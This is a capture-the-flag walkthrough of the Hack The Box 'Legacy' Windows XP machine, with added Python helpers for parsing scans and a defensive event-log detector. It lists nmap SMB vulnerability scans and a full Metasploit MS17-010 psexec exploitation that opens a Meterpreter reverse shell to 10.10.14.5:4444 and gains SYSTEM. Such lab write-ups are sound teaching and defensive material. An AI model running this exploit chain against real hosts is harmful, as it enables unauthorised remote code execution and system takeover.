【HackTheBox】Legacy - Walkthrough -
Tags: Security, KaliLinux, CTF, HackTheBox
For more on Hack The Box, see also "Kali Linux tuning for enjoying Hack The Box".
Machine details
Executive summary
Tools
Detailed procedure
Network service scan
nmap
Add the IP address 10.10.10.4 to /etc/hosts as legacy.htb. Then run a port scan with nmap. The purpose of each option is as follows.
-Pn: skip the host-discovery ping that would normally run before the scan and scan the host regardless.
-T4: sets the timing template. Here "aggressive (4)" is used, which caps the dynamic scan delay for TCP ports at 10 ms.
-A: enables OS detection and version detection.
-v: verbose mode; prints details.
Nmap Network Scanning, https://nmap.org/man/ja/man-briefoptions.html
kali@kali:~$ nmap -Pn -T4 -A -v legacy.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 03:26 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:26
Completed NSE at 03:26, 0.00s elapsed
Initiating NSE at 03:26
Completed NSE at 03:26, 0.00s elapsed
Initiating NSE at 03:26
Completed NSE at 03:26, 0.00s elapsed
Initiating Connect Scan at 03:26
Scanning legacy.htb (10.10.10.4) [1000 ports]
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Completed Connect Scan at 03:27, 27.82s elapsed (1000 total ports)
Initiating Service scan at 03:27
Scanning 2 services on legacy.htb (10.10.10.4)
Completed Service scan at 03:27, 6.84s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.4.
Initiating NSE at 03:27
Completed NSE at 03:28, 51.87s elapsed
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h29m24s, deviation: 2h07m15s, median: 4d22h59m25s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:7e:96 (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-09-02T12:26:41+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
NSE: Script Post-scanning.
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.21 seconds
The services running on the target are now known. Those of particular interest are:

Port     Service       Version
139/tcp  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  microsoft-ds  Windows XP microsoft-ds
SMB service scan
Let's enumerate the SMB service in detail by running the rpcclient command. Unfortunately, it does not seem to allow anonymous connections.
kali@kali:~$ rpcclient -U "" legacy.htb
Enter WORKGROUP\'s password:
Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT
With nmap, the Nmap Scripting Engine (NSE) lets you write scripts in the Lua language that automate network tasks. Here we pass the -script option to run all of the SMB vulnerability scripts against legacy.htb at once.
kali@kali:~$ nmap -Pn -v -script smb-vuln* -p 139,445 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 03:48 EDT
NSE: Loaded 11 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:48
Completed NSE at 03:48, 0.00s elapsed
Initiating Connect Scan at 03:48
Scanning legacy.htb (10.10.10.4) [2 ports]
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Completed Connect Scan at 03:48, 0.28s elapsed (2 total ports)
NSE: Script scanning 10.10.10.4.
Initiating NSE at 03:48
Completed NSE at 03:48, 6.76s elapsed
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.28s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
NSE: Script Post-scanning.
Initiating NSE at 03:48
Completed NSE at 03:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.31 seconds
The result confirms that the MS17-010 (CVE-2017-0143) vulnerability is present.
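The two scans above were read by eye. As an added example (not part of the original walkthrough and not Nmap's own code), here is a small Python triage parser for Nmap's normal text output that extracts the same facts: the open ports from the first scan, the `message_signing: disabled` line from `smb-security-mode`, and every `smb-vuln-*` script that reports `State: VULNERABLE` together with its CVE ids. `SAMPLE_SCAN` is a constructed, abbreviated copy of the output shown above, and the severity labels in `triage()` are this example's own choice.

```python
"""Triage parser for Nmap's normal text output (port table + host script results).

Added example: not part of the original walkthrough and not Nmap's own code.
SAMPLE_SCAN is a constructed, abbreviated copy of the two scans shown above.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SAMPLE_SCAN = """\
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.20s latency).
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")
SCRIPT_RE = re.compile(r"^\|_?\s?([a-z0-9-]+):\s*(.*)$")  # "| name:" or "|_name: value"
CVE_RE = re.compile(r"CVE:(CVE-\d{4}-\d+)")


@dataclass
class ScanFindings:
    host: str = ""
    open_ports: list[tuple[str, str, str]] = field(default_factory=list)  # (port, service, version)
    vulnerable: dict[str, list[str]] = field(default_factory=dict)        # script -> CVE ids
    weak_settings: list[str] = field(default_factory=list)
    script_errors: list[str] = field(default_factory=list)


def parse_nmap_text(text: str) -> ScanFindings:
    f = ScanFindings()
    current = None  # name of the host script whose indented block we are inside
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("Nmap scan report for "):
            f.host = line[len("Nmap scan report for "):]
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            if state == "open":
                f.open_ports.append((f"{port}/{proto}", service, version or ""))
            continue
        if not line.startswith("|"):
            continue
        m = SCRIPT_RE.match(line)
        if m:  # an unindented "name:" line opens a new script block
            current, value = m.group(1), m.group(2)
            if value.startswith("ERROR"):
                f.script_errors.append(current)
            continue
        if current is None:
            continue
        body = line.lstrip("|_ ")
        if current.startswith("smb-vuln"):
            if body == "State: VULNERABLE":
                f.vulnerable.setdefault(current, [])
            for cve in CVE_RE.findall(body):
                f.vulnerable.setdefault(current, []).append(cve)
        elif current == "smb-security-mode" and body.startswith("message_signing: disabled"):
            f.weak_settings.append("smb-security-mode: message_signing disabled")
    return f


def triage(text: str) -> list[str]:
    """One action item per finding, most severe first (labels are this example's own)."""
    f = parse_nmap_text(text)
    items = []
    for script, cves in sorted(f.vulnerable.items()):
        items.append(f"CRITICAL {f.host}: {script} reports VULNERABLE "
                     f"({', '.join(cves) or 'no CVE listed'}) - patch or isolate the host")
    for w in f.weak_settings:
        items.append(f"MEDIUM {f.host}: {w} - require SMB signing")
    for port, service, _ in f.open_ports:
        items.append(f"INFO {f.host}: {port} {service} open")
    for s in f.script_errors:
        items.append(f"NOTE {f.host}: {s} did not complete; rerun with -d")
    return items


if __name__ == "__main__":
    for item in triage(SAMPLE_SCAN):
        print(item)
```

Feed it the real `nmap -oN` file instead of `SAMPLE_SCAN` and the same parser works, because it keys only on the `|` / `|_` prefixes and the `State: VULNERABLE` and `CVE:` tokens that NSE's vulnerability library always emits.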
Using Metasploit
Searching for an attack module
Search the Metasploit Framework for code that corresponds to MS17-010 (CVE-2017-0143).
kali@kali:~$ msfconsole
msf5 > search cve-2017-0143
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce
Module 4, exploit/windows/smb/ms17_010_psexec, looks usable.
Configuring the attack module
Declare the module found above with the use command. Once that succeeds, the prompt changes to msf5 exploit(windows/smb/ms17_010_psexec) >.
msf5 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) >
Check the items to configure for the module with the options command.
Items whose [Required] column is [yes] must be set.
Here they are [DBGTRACE], [LEAKATTEMPTS], [NAMED_PIPES], [RHOSTS], [RPORT] and [SHARE].
However, every one of them except [RHOSTS] already has a value, so setting only [RHOSTS] completes the configuration.
msf5 exploit(windows/smb/ms17_010_psexec) > options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) >
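The rule the text applies by eye (an option needs attention when its Required column is "yes" and its Current Setting is empty) is easy to get wrong on a long listing. As an added example, not part of the original walkthrough and not Metasploit's own code, the following Python reads the `options` output into structured rows and reports which options are still unset. `OPTIONS_LISTING` is a constructed copy of the listing above; the parser keys on the `yes`/`no` Required token, so it works on whitespace-collapsed text as well as on msfconsole's aligned columns.

```python
"""Parse msfconsole's `options` listing and report required options that are still unset.

Added example: not part of the original walkthrough and not Metasploit's own code.
OPTIONS_LISTING is a constructed copy of the listing shown above.
"""
from __future__ import annotations
import re

OPTIONS_LISTING = """\
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
"""

SECTION_RE = re.compile(r"^(Module options|Payload options) \((.+)\):$")
# Name, then the (possibly empty) current setting, then the first standalone yes/no, then the description.
ROW_RE = re.compile(r"^(\S+)\s+(.*?)\s*\b(yes|no)\b\s+(.*)$")


def parse_options(listing: str) -> dict[str, list[dict[str, str]]]:
    """Map each 'Module options' / 'Payload options' section to its parsed rows."""
    sections: dict[str, list[dict[str, str]]] = {}
    current = None
    for line in listing.splitlines():
        line = line.strip()
        sec = SECTION_RE.match(line)
        if sec:
            current = f"{sec.group(1)} ({sec.group(2)})"
            sections[current] = []
            continue
        if line.endswith(":"):  # e.g. "Exploit target:", a table with no Required column
            current = None
            continue
        row = ROW_RE.match(line)
        if row and current is not None:
            name, setting, required, desc = row.groups()
            sections[current].append({"Name": name, "Current Setting": setting,
                                      "Required": required, "Description": desc})
    return sections


def required_options(sections: dict[str, list[dict[str, str]]],
                     section_prefix: str = "Module options") -> list[str]:
    """Names with Required=yes in the sections whose title starts with section_prefix."""
    return [r["Name"] for title, rows in sections.items() if title.startswith(section_prefix)
            for r in rows if r["Required"] == "yes"]


def unset_required(sections: dict[str, list[dict[str, str]]]) -> list[str]:
    """Required options that have no current value, i.e. the ones `set` must still supply."""
    return [r["Name"] for rows in sections.values()
            for r in rows if r["Required"] == "yes" and not r["Current Setting"]]


if __name__ == "__main__":
    parsed = parse_options(OPTIONS_LISTING)
    print("required:", required_options(parsed))
    print("still unset:", unset_required(parsed))
```

Run against the listing above, `required_options()` returns the six names the text lists and `unset_required()` returns just `RHOSTS`, which is exactly the conclusion drawn in the text.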
The value to set in [RHOSTS] is "The target host(s)", i.e. the IP address of legacy.htb. Values are set with the set command:
set <option name> <value>
So in this case the following command sets it.
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) >
Running the attack module
Run the exploit code with the exploit command.
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x821167c0
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... CWqoNatO.exe
[*] 10.10.10.4:445 - Created \CWqoNatO.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \CWqoNatO.exe...
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.4:1032) at 2020-08-28 04:04:05 -0400
The meterpreter prompt appears. Checking the privilege level with the getuid command shows that NT AUTHORITY\SYSTEM was obtained. With that, the legacy.htb machine has been taken over.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
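From the defender's side, the exploit transcript above leaves a visible trail: a randomly named executable is written to the share root (`ADMIN$`, i.e. `%SystemRoot%`), registered and started as a service, then deleted. As an added example, not from the original walkthrough, here is Python detection logic that scores Windows System-log "A service was installed in the system" (event 7045) records for that pattern. The log lines in `SAMPLE_LOG` are constructed for this demo in a simple `timestamp,event_id,host,message` form; the service names, the `%SystemRoot%` expansion to `C:\WINDOWS`, the randomness heuristic and the alert threshold are all assumptions made here.

```python
"""Score Windows System-log service-install records (event 7045) for a psexec-style drop.

Added example: not from the original walkthrough. SAMPLE_LOG is constructed;
event id 7045 is real, the field layout, names and thresholds are assumptions.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

SAMPLE_LOG = """\
2020-08-27T10:00:00,7045,LEGACY,Service Name: wuauserv; Service File Name: C:\\WINDOWS\\system32\\svchost.exe -k netsvcs; Service Start Type: auto start; Service Account: LocalSystem
2020-08-28T03:10:00,7045,LEGACY,Service Name: VMTools; Service File Name: C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe; Service Start Type: auto start; Service Account: LocalSystem
2020-08-28T04:04:03,7045,LEGACY,Service Name: pBxQnLwE; Service File Name: %SystemRoot%\\CWqoNatO.exe; Service Start Type: demand start; Service Account: LocalSystem
2020-08-28T04:04:03,7036,LEGACY,The pBxQnLwE service entered the running state.
2020-08-28T04:04:06,7036,LEGACY,The pBxQnLwE service entered the stopped state.
"""

FIELD_RE = re.compile(r"(Service Name|Service File Name|Service Start Type|Service Account): ([^;]*)")
RANDOM_TOKEN = re.compile(r"[A-Za-z]{8}")


@dataclass
class ServiceInstall:
    when: str
    host: str
    name: str
    image: str
    start_type: str
    account: str


def parse_7045(log: str) -> list[ServiceInstall]:
    """Pull the service-install fields out of every 7045 record; other events are ignored."""
    out = []
    for line in log.splitlines():
        when, event_id, host, message = line.split(",", 3)
        if event_id != "7045":
            continue
        f = dict(FIELD_RE.findall(message))
        out.append(ServiceInstall(when, host, f.get("Service Name", ""), f.get("Service File Name", ""),
                                  f.get("Service Start Type", ""), f.get("Service Account", "")))
    return out


def looks_random(token: str) -> bool:
    """Assumed heuristic: exactly 8 letters in mixed case, like the generated names in the transcript."""
    return bool(RANDOM_TOKEN.fullmatch(token)) and token != token.lower() and token != token.upper()


def image_path(image: str) -> str:
    """Executable part of the service command line, with %SystemRoot% expanded (XP default assumed)."""
    m = re.match(r'"?(.+?\.exe)', image, re.IGNORECASE)
    path = m.group(1) if m else image
    return re.sub(r"%systemroot%", r"C:\\WINDOWS", path, flags=re.IGNORECASE)


def score(si: ServiceInstall) -> tuple[int, list[str]]:
    """One point per indicator; the reasons explain the score to the analyst."""
    reasons = []
    path = image_path(si.image)
    parent, _, fname = path.rpartition("\\")
    stem = fname[:-4] if fname.lower().endswith(".exe") else fname
    if parent.upper() == "C:\\WINDOWS":
        reasons.append("binary placed directly in %SystemRoot% (where ADMIN$ writes land)")
    if looks_random(stem):
        reasons.append(f"random-looking binary name {fname}")
    if looks_random(si.name):
        reasons.append(f"random-looking service name {si.name}")
    if si.start_type == "demand start" and si.account == "LocalSystem":
        reasons.append("demand-start service running as LocalSystem")
    return len(reasons), reasons


def find_suspicious_installs(log: str, threshold: int = 3) -> list[dict]:
    """Return the 7045 records whose score reaches the (assumed) alert threshold."""
    alerts = []
    for si in parse_7045(log):
        n, reasons = score(si)
        if n >= threshold:
            alerts.append({"when": si.when, "host": si.host, "service": si.name,
                           "image": si.image, "score": n, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_installs(SAMPLE_LOG):
        print(alert["when"], alert["host"], alert["service"], alert["image"], alert["reasons"])
```

Only the third install record crosses the threshold; the Windows Update and VMware Tools services score zero because they live in their normal directories and carry meaningful names. Pairing the 7045 alert with the 7036 start/stop lines a few seconds apart, as in the sample, is what tells an analyst the service was a one-shot launcher rather than something an administrator installed.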
Reference information
Walkthrough
@산포_시호 "【Hack the Box write-up】Legacy"
@유키츠카이47 "Hack The Box[Legacy] -Writeup-"
Other
Source
Original article (Qiita): https://qiita.com/v_avenger/items/fc61a3ad6b5f9d3a6ca8